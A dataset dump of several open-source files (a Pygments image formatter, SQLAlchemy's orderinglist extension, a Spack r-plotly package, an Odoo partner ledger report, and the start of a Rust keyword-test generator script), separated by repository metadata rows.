self.styles = dict(self.style)
if self.style.background_color is None:
self.background_color = '#fff'
else:
self.background_color = self.style.background_color
# Image options
self.image_format = get_choice_opt(
options, 'image_format', ['png', 'jpeg', 'gif', 'bmp'],
self.default_image_format, normcase=True)
self.image_pad = get_int_opt(options, 'image_pad', 10)
self.line_pad = get_int_opt(options, 'line_pad', 2)
# The fonts
fontsize = get_int_opt(options, 'font_size', 14)
self.fonts = FontManager(options.get('font_name', ''), fontsize)
self.fontw, self.fonth = self.fonts.get_char_size()
# Line number options
self.line_number_fg = options.get('line_number_fg', '#886')
self.line_number_bg = options.get('line_number_bg', '#eed')
self.line_number_chars = get_int_opt(options,
'line_number_chars', 2)
self.line_number_bold = get_bool_opt(options,
'line_number_bold', False)
self.line_number_italic = get_bool_opt(options,
'line_number_italic', False)
self.line_number_pad = get_int_opt(options, 'line_number_pad', 6)
self.line_numbers = get_bool_opt(options, 'line_numbers', True)
self.line_number_separator = get_bool_opt(options,
'line_number_separator', True)
self.line_number_step = get_int_opt(options, 'line_number_step', 1)
self.line_number_start = get_int_opt(options, 'line_number_start', 1)
if self.line_numbers:
self.line_number_width = (self.fontw * self.line_number_chars +
self.line_number_pad * 2)
else:
self.line_number_width = 0
self.hl_lines = []
hl_lines_str = get_list_opt(options, 'hl_lines', [])
for line in hl_lines_str:
try:
self.hl_lines.append(int(line))
except ValueError:
pass
self.hl_color = options.get('hl_color',
self.style.highlight_color) or '#f90'
self.drawables = []
def get_style_defs(self, arg=''):
raise NotImplementedError('The -S option is meaningless for the image '
'formatter. Use -O style=<stylename> instead.')
def _get_line_height(self):
"""
Get the height of a line.
"""
return self.fonth + self.line_pad
def _get_line_y(self, lineno):
"""
Get the Y coordinate of a line number.
"""
return lineno * self._get_line_height() + self.image_pad
def _get_char_width(self):
"""
Get the width of a character.
"""
return self.fontw
def _get_char_x(self, charno):
"""
Get the X coordinate of a character position.
"""
return charno * self.fontw + self.image_pad + self.line_number_width
def _get_text_pos(self, charno, lineno):
"""
Get the actual position for a character and line position.
"""
return self._get_char_x(charno), self._get_line_y(lineno)
def _get_linenumber_pos(self, lineno):
"""
Get the actual position for the start of a line number.
"""
return (self.image_pad, self._get_line_y(lineno))
def _get_text_color(self, style):
"""
Get the correct color for the token from the style.
"""
if style['color'] is not None:
fill = '#' + style['color']
else:
fill = '#000'
return fill
def _get_style_font(self, style):
"""
Get the correct font for the style.
"""
return self.fonts.get_font(style['bold'], style['italic'])
def _get_image_size(self, maxcharno, maxlineno):
"""
Get the required image size.
"""
return (self._get_char_x(maxcharno) + self.image_pad,
                self._get_line_y(maxlineno) + self.image_pad)
def _draw_linenumber(self, posno, lineno):
"""
Remember a line number drawable to paint later.
"""
self._draw_text(
self._get_linenumber_pos(posno),
str(lineno).rjust(self.line_number_chars),
font=self.fonts.get_font(self.line_number_bold,
self.line_number_italic),
fill=self.line_number_fg,
)
def _draw_text(self, pos, text, font, **kw):
"""
Remember a single drawable tuple to paint later.
"""
self.drawables.append((pos, text, font, kw))
def _create_drawables(self, tokensource):
"""
Create drawables for the token content.
"""
lineno = charno = maxcharno = 0
for ttype, value in tokensource:
while ttype not in self.styles:
ttype = ttype.parent
style = self.styles[ttype]
# TODO: make sure tab expansion happens earlier in the chain. It
# really ought to be done on the input, as to do it right here is
# quite complex.
value = value.expandtabs(4)
lines = value.splitlines(True)
#print lines
for i, line in enumerate(lines):
temp = line.rstrip('\n')
if temp:
self._draw_text(
self._get_text_pos(charno, lineno),
temp,
font = self._get_style_font(style),
fill = self._get_text_color(style)
)
charno += len(temp)
maxcharno = max(maxcharno, charno)
if line.endswith('\n'):
# add a line for each extra line in the value
charno = 0
lineno += 1
self.maxcharno = maxcharno
self.maxlineno = lineno
def _draw_line_numbers(self):
"""
Create drawables for the line numbers.
"""
if not self.line_numbers:
return
for p in range(self.maxlineno):
n = p + self.line_number_start
if (n % self.line_number_step) == 0:
self._draw_linenumber(p, n)
def _paint_line_number_bg(self, im):
"""
Paint the line number background on the image.
"""
if not self.line_numbers:
return
if self.line_number_fg is None:
return
draw = ImageDraw.Draw(im)
recth = im.size[-1]
rectw = self.image_pad + self.line_number_width - self.line_number_pad
draw.rectangle([(0, 0),
(rectw, recth)],
fill=self.line_number_bg)
draw.line([(rectw, 0), (rectw, recth)], fill=self.line_number_fg)
del draw
def format(self, tokensource, outfile):
"""
Format ``tokensource``, an iterable of ``(tokentype, tokenstring)``
tuples and write it into ``outfile``.
This implementation calculates where it should draw each token on the
pixmap, then calculates the required pixmap size and draws the items.
"""
self._create_drawables(tokensource)
self._draw_line_numbers()
im = Image.new(
'RGB',
self._get_image_size(self.maxcharno, self.maxlineno),
self.background_color
)
self._paint_line_number_bg(im)
draw = ImageDraw.Draw(im)
# Highlight
if self.hl_lines:
x = self.image_pad + self.line_number_width - self.line_number_pad + 1
recth = self._get_line_height()
rectw = im.size[0] - x
for linenumber in self.hl_lines:
y = self._get_line_y(linenumber - 1)
draw.rectangle([(x, y), (x + rectw, y + recth)],
fill=self.hl_color)
for pos, value, font, kw in self.drawables:
draw.text(pos, value, font=font, **kw)
im.save(outfile, self.image_format.upper())
# Add one formatter per format, so that the "-f gif" option gives the correct result
# when used in pygmentize.
class GifImageFormatter(ImageFormatter):
"""
Create a GIF image from source code. This uses the Python Imaging Library to
generate a pixmap from the source code.
*New in Pygments 1.0.* (You could create GIF images before by passing a
suitable `image_format` option to the `ImageFormatter`.)
"""
name = 'img_gif'
aliases = ['gif']
filenames = ['*.gif']
default_image_format = 'gif'
class JpgImageFormatter(ImageFormatter):
"""
Create a JPEG image from source code. This uses the Python Imaging Library to
generate a pixmap from the source code.
*New in Pygments 1.0.* (You could create JPEG images before by passing a
suitable `image_format` option to the `ImageFormatter`.)
"""
name = 'img_jpg'
aliases = ['jpg', 'jpeg']
filenames = ['*.jpg']
default_image_format = 'jpeg'
class BmpImageFormatter(ImageFormatter):
"""
Create a bitmap image from source code. This uses the Python Imaging Library to
generate a pixmap from the source code.
*New in Pygments 1.0.* (You could create bitmap images before by passing a
suitable `image_format` option to the `ImageFormatter`.)
"""
name = 'img_bmp'
aliases = ['bmp', 'bitmap']
filenames = ['*.bmp']
default_image_format = 'bmp'
| mit | -523,872,509,259,411,200 | 31.64557 | 84 | 0.551321 | false |
sqlalchemy/sqlalchemy | lib/sqlalchemy/ext/orderinglist.py | 3 | 13875 | # ext/orderinglist.py
# Copyright (C) 2005-2021 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: https://www.opensource.org/licenses/mit-license.php
"""A custom list that manages index/position information for contained
elements.
:author: Jason Kirtland
``orderinglist`` is a helper for mutable ordered relationships. It will
intercept list operations performed on a :func:`_orm.relationship`-managed
collection and
automatically synchronize changes in list position onto a target scalar
attribute.
Example: A ``slide`` table, where each row refers to zero or more entries
in a related ``bullet`` table. The bullets within a slide are
displayed in order based on the value of the ``position`` column in the
``bullet`` table. As entries are reordered in memory, the value of the
``position`` attribute should be updated to reflect the new sort order::
Base = declarative_base()
class Slide(Base):
__tablename__ = 'slide'
id = Column(Integer, primary_key=True)
name = Column(String)
bullets = relationship("Bullet", order_by="Bullet.position")
class Bullet(Base):
__tablename__ = 'bullet'
id = Column(Integer, primary_key=True)
slide_id = Column(Integer, ForeignKey('slide.id'))
position = Column(Integer)
text = Column(String)
The standard relationship mapping will produce a list-like attribute on each
``Slide`` containing all related ``Bullet`` objects,
but coping with changes in ordering is not handled automatically.
When appending a ``Bullet`` into ``Slide.bullets``, the ``Bullet.position``
attribute will remain unset until manually assigned. When the ``Bullet``
is inserted into the middle of the list, the following ``Bullet`` objects
will also need to be renumbered.
The :class:`.OrderingList` object automates this task, managing the
``position`` attribute on all ``Bullet`` objects in the collection. It is
constructed using the :func:`.ordering_list` factory::
from sqlalchemy.ext.orderinglist import ordering_list
Base = declarative_base()
class Slide(Base):
__tablename__ = 'slide'
id = Column(Integer, primary_key=True)
name = Column(String)
bullets = relationship("Bullet", order_by="Bullet.position",
collection_class=ordering_list('position'))
class Bullet(Base):
__tablename__ = 'bullet'
id = Column(Integer, primary_key=True)
slide_id = Column(Integer, ForeignKey('slide.id'))
position = Column(Integer)
text = Column(String)
With the above mapping the ``Bullet.position`` attribute is managed::
s = Slide()
s.bullets.append(Bullet())
s.bullets.append(Bullet())
s.bullets[1].position
>>> 1
s.bullets.insert(1, Bullet())
s.bullets[2].position
>>> 2
The :class:`.OrderingList` construct only works with **changes** to a
collection, and not the initial load from the database, and requires that the
list be sorted when loaded. Therefore, be sure to specify ``order_by`` on the
:func:`_orm.relationship` against the target ordering attribute, so that the
ordering is correct when first loaded.
.. warning::
:class:`.OrderingList` only provides limited functionality when a primary
key column or unique column is the target of the sort. Operations
that are unsupported or are problematic include:
* two entries must trade values. This is not supported directly in the
case of a primary key or unique constraint because it means at least
one row would need to be temporarily removed first, or changed to
a third, neutral value while the switch occurs.
* an entry must be deleted in order to make room for a new entry.
SQLAlchemy's unit of work performs all INSERTs before DELETEs within a
single flush. In the case of a primary key, it will trade
an INSERT/DELETE of the same primary key for an UPDATE statement in order
to lessen the impact of this limitation, however this does not take place
for a UNIQUE column.
A future feature will allow the "DELETE before INSERT" behavior to be
possible, alleviating this limitation, though this feature will require
explicit configuration at the mapper level for sets of columns that
are to be handled in this way.
:func:`.ordering_list` takes the name of the related object's ordering
attribute as an argument. By default, the zero-based integer index of the
object's position in the :func:`.ordering_list` is synchronized with the
ordering attribute: index 0 will get position 0, index 1 position 1, etc. To
start numbering at 1 or some other integer, provide ``count_from=1``.
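
For example, with ``count_from=1`` the first element is numbered 1 rather
than 0 (a sketch reusing the ``Slide``/``Bullet`` mapping above)::

    bullets = relationship("Bullet", order_by="Bullet.position",
                           collection_class=ordering_list('position',
                                                          count_from=1))

    s = Slide()
    s.bullets.append(Bullet())
    s.bullets[0].position
    >>> 1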
"""
from ..orm.collections import collection
from ..orm.collections import collection_adapter
__all__ = ["ordering_list"]
def ordering_list(attr, count_from=None, **kw):
"""Prepares an :class:`OrderingList` factory for use in mapper definitions.
Returns an object suitable for use as an argument to a Mapper
relationship's ``collection_class`` option. e.g.::
from sqlalchemy.ext.orderinglist import ordering_list
class Slide(Base):
__tablename__ = 'slide'
id = Column(Integer, primary_key=True)
name = Column(String)
bullets = relationship("Bullet", order_by="Bullet.position",
collection_class=ordering_list('position'))
:param attr:
Name of the mapped attribute to use for storage and retrieval of
ordering information
:param count_from:
Set up an integer-based ordering, starting at ``count_from``. For
example, ``ordering_list('pos', count_from=1)`` would create a 1-based
list in SQL, storing the value in the 'pos' column. Ignored if
``ordering_func`` is supplied.
Additional arguments are passed to the :class:`.OrderingList` constructor.
"""
kw = _unsugar_count_from(count_from=count_from, **kw)
return lambda: OrderingList(attr, **kw)
# Ordering utility functions
def count_from_0(index, collection):
"""Numbering function: consecutive integers starting at 0."""
return index
def count_from_1(index, collection):
"""Numbering function: consecutive integers starting at 1."""
return index + 1
def count_from_n_factory(start):
"""Numbering function: consecutive integers starting at arbitrary start."""
def f(index, collection):
return index + start
try:
f.__name__ = "count_from_%i" % start
except TypeError:
pass
return f
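# For instance, count_from_n_factory(5) numbers elements 5, 6, 7, ... --
# the same effect as passing count_from=5 to ordering_list().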
def _unsugar_count_from(**kw):
"""Builds counting functions from keyword arguments.
Keyword argument filter, prepares a simple ``ordering_func`` from a
``count_from`` argument, otherwise passes ``ordering_func`` on unchanged.
"""
count_from = kw.pop("count_from", None)
if kw.get("ordering_func", None) is None and count_from is not None:
if count_from == 0:
kw["ordering_func"] = count_from_0
elif count_from == 1:
kw["ordering_func"] = count_from_1
else:
kw["ordering_func"] = count_from_n_factory(count_from)
return kw
class OrderingList(list):
"""A custom list that manages position information for its children.
The :class:`.OrderingList` object is normally set up using the
:func:`.ordering_list` factory function, used in conjunction with
the :func:`_orm.relationship` function.
"""
def __init__(
self, ordering_attr=None, ordering_func=None, reorder_on_append=False
):
"""A custom list that manages position information for its children.
``OrderingList`` is a ``collection_class`` list implementation that
syncs position in a Python list with a position attribute on the
mapped objects.
This implementation relies on the list starting in the proper order,
so be **sure** to put an ``order_by`` on your relationship.
:param ordering_attr:
Name of the attribute that stores the object's order in the
relationship.
:param ordering_func: Optional. A function that maps the position in
the Python list to a value to store in the
``ordering_attr``. Values returned are usually (but need not be!)
integers.
An ``ordering_func`` is called with two positional parameters: the
index of the element in the list, and the list itself.
If omitted, Python list indexes are used for the attribute values.
Two basic pre-built numbering functions are provided in this module:
``count_from_0`` and ``count_from_1``. For more exotic examples
like stepped numbering, alphabetical and Fibonacci numbering, see
the unit tests.
:param reorder_on_append:
Default False. When appending an object with an existing (non-None)
ordering value, that value will be left untouched unless
``reorder_on_append`` is true. This is an optimization to avoid a
variety of dangerous unexpected database writes.
SQLAlchemy will add instances to the list via append() when your
object loads. If for some reason the result set from the database
skips a step in the ordering (say, row '1' is missing but you get
'2', '3', and '4'), reorder_on_append=True would immediately
renumber the items to '1', '2', '3'. If you have multiple sessions
making changes, any of whom happen to load this collection even in
passing, all of the sessions would try to "clean up" the numbering
in their commits, possibly causing all but one to fail with a
concurrent modification error.
          It is recommended to leave this at the default of False and to
          call ``reorder()`` explicitly if you're doing ``append()``
          operations with previously ordered instances, or when doing some
          housekeeping after manual SQL operations.
"""
self.ordering_attr = ordering_attr
if ordering_func is None:
ordering_func = count_from_0
self.ordering_func = ordering_func
self.reorder_on_append = reorder_on_append
# More complex serialization schemes (multi column, e.g.) are possible by
# subclassing and reimplementing these two methods.
def _get_order_value(self, entity):
return getattr(entity, self.ordering_attr)
def _set_order_value(self, entity, value):
setattr(entity, self.ordering_attr, value)
def reorder(self):
"""Synchronize ordering for the entire collection.
Sweeps through the list and ensures that each object has accurate
ordering information set.
"""
for index, entity in enumerate(self):
self._order_entity(index, entity, True)
# As of 0.5, _reorder is no longer semi-private
_reorder = reorder
def _order_entity(self, index, entity, reorder=True):
have = self._get_order_value(entity)
# Don't disturb existing ordering if reorder is False
if have is not None and not reorder:
return
should_be = self.ordering_func(index, self)
if have != should_be:
self._set_order_value(entity, should_be)
def append(self, entity):
super(OrderingList, self).append(entity)
self._order_entity(len(self) - 1, entity, self.reorder_on_append)
def _raw_append(self, entity):
"""Append without any ordering behavior."""
super(OrderingList, self).append(entity)
_raw_append = collection.adds(1)(_raw_append)
def insert(self, index, entity):
super(OrderingList, self).insert(index, entity)
self._reorder()
def remove(self, entity):
super(OrderingList, self).remove(entity)
adapter = collection_adapter(self)
if adapter and adapter._referenced_by_owner:
self._reorder()
def pop(self, index=-1):
entity = super(OrderingList, self).pop(index)
self._reorder()
return entity
def __setitem__(self, index, entity):
if isinstance(index, slice):
step = index.step or 1
start = index.start or 0
if start < 0:
start += len(self)
stop = index.stop or len(self)
if stop < 0:
stop += len(self)
for i in range(start, stop, step):
self.__setitem__(i, entity[i])
else:
self._order_entity(index, entity, True)
super(OrderingList, self).__setitem__(index, entity)
def __delitem__(self, index):
super(OrderingList, self).__delitem__(index)
self._reorder()
def __setslice__(self, start, end, values):
super(OrderingList, self).__setslice__(start, end, values)
self._reorder()
def __delslice__(self, start, end):
super(OrderingList, self).__delslice__(start, end)
self._reorder()
def __reduce__(self):
return _reconstitute, (self.__class__, self.__dict__, list(self))
for func_name, func in list(locals().items()):
if (
callable(func)
and func.__name__ == func_name
and not func.__doc__
and hasattr(list, func_name)
):
func.__doc__ = getattr(list, func_name).__doc__
del func_name, func
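# Editorial sketch: contrasting the default append() behavior (an existing
# ordering value is preserved) with an explicit reorder(), as described in
# the __init__ docstring above. ``_Row`` is a hypothetical stand-in.
def _reorder_on_append_demo():
    class _Row(object):
        def __init__(self, position=None):
            self.position = position

    rows = OrderingList('position')   # reorder_on_append defaults to False
    rows.append(_Row(position=7))     # pre-set value is left untouched
    assert rows[0].position == 7
    rows.reorder()                    # explicit cleanup renumbers from 0
    assert rows[0].position == 0
    return rows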
def _reconstitute(cls, dict_, items):
"""Reconstitute an :class:`.OrderingList`.
This is the adjoint to :meth:`.OrderingList.__reduce__`. It is used for
unpickling :class:`.OrderingList` objects.
"""
obj = cls.__new__(cls)
obj.__dict__.update(dict_)
list.extend(obj, items)
return obj
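# Editorial sketch: __reduce__ and _reconstitute together make OrderingList
# pickleable, assuming this module is importable under its normal name.
def _pickle_roundtrip_demo():
    import pickle
    original = OrderingList('position', ordering_func=count_from_1)
    restored = pickle.loads(pickle.dumps(original))
    return (restored.ordering_attr == 'position' and
            restored.ordering_func is count_from_1)   # True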
| mit | 6,990,032,291,811,268,000 | 34.760309 | 79 | 0.654919 | false |
mfherbst/spack | var/spack/repos/builtin/packages/r-plotly/package.py | 5 | 2533 | ##############################################################################
# Copyright (c) 2013-2018, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class RPlotly(RPackage):
"""Easily translate 'ggplot2' graphs to an interactive web-based version
and/or create custom web-based visualizations directly from R."""
homepage = "https://cran.r-project.org/web/packages/plotly/index.html"
url = "https://cran.r-project.org/src/contrib/plotly_4.7.1.tar.gz"
list_url = "https://cran.rstudio.com/src/contrib/Archive/plotly"
version('4.7.1', '4799c8b429291d4c52fb904380806548')
version('4.7.0', '5bd52d515c01af7ff291c30a6cf23bec')
version('4.6.0', '27ff3de288bacfaad6e6694752ea2929')
version('4.5.6', 'e6e00177fa64dc6b1a199facfd73f585')
version('4.5.2', '7eb11b24a9faa9a572657fd89ed72fa5')
depends_on('r@3.4.0:3.4.9')
depends_on('r-ggplot2', type=('build', 'run'))
depends_on('r-httr', type=('build', 'run'))
depends_on('r-base64enc', type=('build', 'run'))
depends_on('r-htmltools', type=('build', 'run'))
depends_on('r-tidyr', type=('build', 'run'))
depends_on('r-dplyr', type=('build', 'run'))
depends_on('r-htmlwidgets', type=('build', 'run'))
depends_on('r-data-table', type=('build', 'run'))
depends_on('r-hexbin', type=('build', 'run'))
depends_on('r-purrr', type=('build', 'run'))
depends_on('r-crosstalk', type=('build', 'run'))
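    # Editorial note (sketch): with this recipe on a Spack repository path,
    # the package is typically built with ``spack install r-plotly`` and
    # made available with ``spack load r-plotly``.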
| lgpl-2.1 | 3,101,067,797,805,543,000 | 46.792453 | 78 | 0.660087 | false |
dllsf/odootest | addons/account/report/account_partner_ledger.py | 81 | 13063 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
from openerp.osv import osv
from openerp.tools.translate import _
from openerp.report import report_sxw
from common_report_header import common_report_header
class third_party_ledger(report_sxw.rml_parse, common_report_header):
def __init__(self, cr, uid, name, context=None):
super(third_party_ledger, self).__init__(cr, uid, name, context=context)
self.init_bal_sum = 0.0
self.localcontext.update({
'time': time,
'lines': self.lines,
'sum_debit_partner': self._sum_debit_partner,
'sum_credit_partner': self._sum_credit_partner,
'get_currency': self._get_currency,
'get_start_period': self.get_start_period,
'get_end_period': self.get_end_period,
'get_account': self._get_account,
'get_filter': self._get_filter,
'get_start_date': self._get_start_date,
'get_end_date': self._get_end_date,
'get_fiscalyear': self._get_fiscalyear,
'get_journal': self._get_journal,
'get_partners':self._get_partners,
'get_intial_balance':self._get_intial_balance,
'display_initial_balance':self._display_initial_balance,
'display_currency':self._display_currency,
'get_target_move': self._get_target_move,
})
def _get_filter(self, data):
if data['form']['filter'] == 'unreconciled':
return _('Unreconciled Entries')
return super(third_party_ledger, self)._get_filter(data)
def set_context(self, objects, data, ids, report_type=None):
obj_move = self.pool.get('account.move.line')
obj_partner = self.pool.get('res.partner')
self.query = obj_move._query_get(self.cr, self.uid, obj='l', context=data['form'].get('used_context', {}))
ctx2 = data['form'].get('used_context',{}).copy()
self.initial_balance = data['form'].get('initial_balance', True)
if self.initial_balance:
ctx2.update({'initial_bal': True})
self.init_query = obj_move._query_get(self.cr, self.uid, obj='l', context=ctx2)
self.reconcil = True
if data['form']['filter'] == 'unreconciled':
self.reconcil = False
self.result_selection = data['form'].get('result_selection', 'customer')
self.amount_currency = data['form'].get('amount_currency', False)
self.target_move = data['form'].get('target_move', 'all')
PARTNER_REQUEST = ''
move_state = ['draft','posted']
if self.target_move == 'posted':
move_state = ['posted']
if self.result_selection == 'supplier':
self.ACCOUNT_TYPE = ['payable']
elif self.result_selection == 'customer':
self.ACCOUNT_TYPE = ['receivable']
else:
self.ACCOUNT_TYPE = ['payable','receivable']
self.cr.execute(
"SELECT a.id " \
"FROM account_account a " \
"LEFT JOIN account_account_type t " \
"ON (a.type=t.code) " \
'WHERE a.type IN %s' \
"AND a.active", (tuple(self.ACCOUNT_TYPE), ))
self.account_ids = [a for (a,) in self.cr.fetchall()]
params = [tuple(move_state), tuple(self.account_ids)]
        # If we print from the partners, add a clause on active_ids.
if (data['model'] == 'res.partner') and ids:
PARTNER_REQUEST = "AND l.partner_id IN %s"
params += [tuple(ids)]
self.cr.execute(
"SELECT DISTINCT l.partner_id " \
"FROM account_move_line AS l, account_account AS account, " \
" account_move AS am " \
"WHERE l.partner_id IS NOT NULL " \
"AND l.account_id = account.id " \
"AND am.id = l.move_id " \
"AND am.state IN %s"
# "AND " + self.query +" " \
"AND l.account_id IN %s " \
" " + PARTNER_REQUEST + " " \
"AND account.active ", params)
self.partner_ids = [res['partner_id'] for res in self.cr.dictfetchall()]
objects = obj_partner.browse(self.cr, self.uid, self.partner_ids)
return super(third_party_ledger, self).set_context(objects, data, self.partner_ids, report_type)
def lines(self, partner):
move_state = ['draft','posted']
if self.target_move == 'posted':
move_state = ['posted']
full_account = []
if self.reconcil:
RECONCILE_TAG = " "
else:
RECONCILE_TAG = "AND l.reconcile_id IS NULL"
self.cr.execute(
"SELECT l.id, l.date, j.code, acc.code as a_code, acc.name as a_name, l.ref, m.name as move_name, l.name, l.debit, l.credit, l.amount_currency,l.currency_id, c.symbol AS currency_code " \
"FROM account_move_line l " \
"LEFT JOIN account_journal j " \
"ON (l.journal_id = j.id) " \
"LEFT JOIN account_account acc " \
"ON (l.account_id = acc.id) " \
"LEFT JOIN res_currency c ON (l.currency_id=c.id)" \
"LEFT JOIN account_move m ON (m.id=l.move_id)" \
"WHERE l.partner_id = %s " \
"AND l.account_id IN %s AND " + self.query +" " \
"AND m.state IN %s " \
" " + RECONCILE_TAG + " "\
"ORDER BY l.date",
(partner.id, tuple(self.account_ids), tuple(move_state)))
res = self.cr.dictfetchall()
sum = 0.0
if self.initial_balance:
sum = self.init_bal_sum
for r in res:
sum += r['debit'] - r['credit']
r['progress'] = sum
full_account.append(r)
return full_account
def _get_intial_balance(self, partner):
move_state = ['draft','posted']
if self.target_move == 'posted':
move_state = ['posted']
if self.reconcil:
RECONCILE_TAG = " "
else:
RECONCILE_TAG = "AND l.reconcile_id IS NULL"
self.cr.execute(
"SELECT COALESCE(SUM(l.debit),0.0), COALESCE(SUM(l.credit),0.0), COALESCE(sum(debit-credit), 0.0) " \
"FROM account_move_line AS l, " \
"account_move AS m "
"WHERE l.partner_id = %s " \
"AND m.id = l.move_id " \
"AND m.state IN %s "
"AND account_id IN %s" \
" " + RECONCILE_TAG + " "\
"AND " + self.init_query + " ",
(partner.id, tuple(move_state), tuple(self.account_ids)))
res = self.cr.fetchall()
self.init_bal_sum = res[0][2]
return res
def _sum_debit_partner(self, partner):
move_state = ['draft','posted']
if self.target_move == 'posted':
move_state = ['posted']
result_tmp = 0.0
result_init = 0.0
if self.reconcil:
RECONCILE_TAG = " "
else:
RECONCILE_TAG = "AND reconcile_id IS NULL"
if self.initial_balance:
self.cr.execute(
"SELECT sum(debit) " \
"FROM account_move_line AS l, " \
"account_move AS m "
"WHERE l.partner_id = %s" \
"AND m.id = l.move_id " \
"AND m.state IN %s "
"AND account_id IN %s" \
" " + RECONCILE_TAG + " " \
"AND " + self.init_query + " ",
(partner.id, tuple(move_state), tuple(self.account_ids)))
contemp = self.cr.fetchone()
if contemp != None:
result_init = contemp[0] or 0.0
else:
result_init = result_tmp + 0.0
self.cr.execute(
"SELECT sum(debit) " \
"FROM account_move_line AS l, " \
"account_move AS m "
"WHERE l.partner_id = %s " \
"AND m.id = l.move_id " \
"AND m.state IN %s "
"AND account_id IN %s" \
" " + RECONCILE_TAG + " " \
"AND " + self.query + " ",
(partner.id, tuple(move_state), tuple(self.account_ids),))
contemp = self.cr.fetchone()
if contemp != None:
result_tmp = contemp[0] or 0.0
else:
result_tmp = result_tmp + 0.0
return result_tmp + result_init
def _sum_credit_partner(self, partner):
move_state = ['draft','posted']
if self.target_move == 'posted':
move_state = ['posted']
result_tmp = 0.0
result_init = 0.0
if self.reconcil:
RECONCILE_TAG = " "
else:
RECONCILE_TAG = "AND reconcile_id IS NULL"
if self.initial_balance:
self.cr.execute(
"SELECT sum(credit) " \
"FROM account_move_line AS l, " \
"account_move AS m "
"WHERE l.partner_id = %s" \
"AND m.id = l.move_id " \
"AND m.state IN %s "
"AND account_id IN %s" \
" " + RECONCILE_TAG + " " \
"AND " + self.init_query + " ",
(partner.id, tuple(move_state), tuple(self.account_ids)))
contemp = self.cr.fetchone()
if contemp != None:
result_init = contemp[0] or 0.0
else:
result_init = result_tmp + 0.0
self.cr.execute(
"SELECT sum(credit) " \
"FROM account_move_line AS l, " \
"account_move AS m "
"WHERE l.partner_id=%s " \
"AND m.id = l.move_id " \
"AND m.state IN %s "
"AND account_id IN %s" \
" " + RECONCILE_TAG + " " \
"AND " + self.query + " ",
(partner.id, tuple(move_state), tuple(self.account_ids),))
contemp = self.cr.fetchone()
if contemp != None:
result_tmp = contemp[0] or 0.0
else:
result_tmp = result_tmp + 0.0
return result_tmp + result_init
def _get_partners(self):
# TODO: deprecated, to remove in trunk
if self.result_selection == 'customer':
return _('Receivable Accounts')
elif self.result_selection == 'supplier':
return _('Payable Accounts')
elif self.result_selection == 'customer_supplier':
return _('Receivable and Payable Accounts')
return ''
def _sum_currency_amount_account(self, account, form):
self._set_get_account_currency_code(account.id)
self.cr.execute("SELECT sum(aml.amount_currency) FROM account_move_line as aml,res_currency as rc WHERE aml.currency_id = rc.id AND aml.account_id= %s ", (account.id,))
total = self.cr.fetchone()
if self.account_currency:
return_field = str(total[0]) + self.account_currency
return return_field
else:
currency_total = self.tot_currency = 0.0
return currency_total
def _display_initial_balance(self, data):
if self.initial_balance:
return True
return False
def _display_currency(self, data):
if self.amount_currency:
return True
return False
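# Editorial sketch (not part of the original report): the running balance
# computed in lines() above, reduced to a pure-Python fold over fetched rows.
def _running_balance_demo(rows, initial=0.0):
    """rows: dicts with 'debit'/'credit' keys, as from cr.dictfetchall()."""
    total = initial
    out = []
    for row in rows:
        total += row['debit'] - row['credit']
        out.append(dict(row, progress=total))
    return out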
class report_partnerledger(osv.AbstractModel):
_name = 'report.account.report_partnerledger'
_inherit = 'report.abstract_report'
_template = 'account.report_partnerledger'
_wrapped_report_class = third_party_ledger
class report_partnerledgerother(osv.AbstractModel):
_name = 'report.account.report_partnerledgerother'
_inherit = 'report.abstract_report'
_template = 'account.report_partnerledgerother'
_wrapped_report_class = third_party_ledger
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | 2,841,644,555,824,371,700 | 40.469841 | 199 | 0.521703 | false |
avdi/rust | src/etc/generate-keyword-tests.py | 53 | 1985 | #!/usr/bin/env python
#
# Copyright 2013 The Rust Project Developers. See the COPYRIGHT
# file at the top-level directory of this distribution and at
# http://rust-lang.org/COPYRIGHT.
#
# Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
# http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
# <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
# option. This file may not be copied, modified, or distributed
# except according to those terms.
"""
This script takes a list of keywords and, for every keyword, generates a
test case that checks that using the keyword as an identifier fails.
The generated test files are set read-only.
Test for https://github.com/rust-lang/rust/issues/2275
sample usage: src/etc/generate-keyword-tests.py as break
"""
import sys
import os
import datetime
import stat
template = """// Copyright %d The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
// This file was auto-generated using 'src/etc/generate-keyword-tests.py %s'
fn main() {
let %s = "foo"; //~ error: ident
}
"""
test_dir = os.path.abspath(
os.path.join(os.path.dirname(__file__), '../test/compile-fail')
)
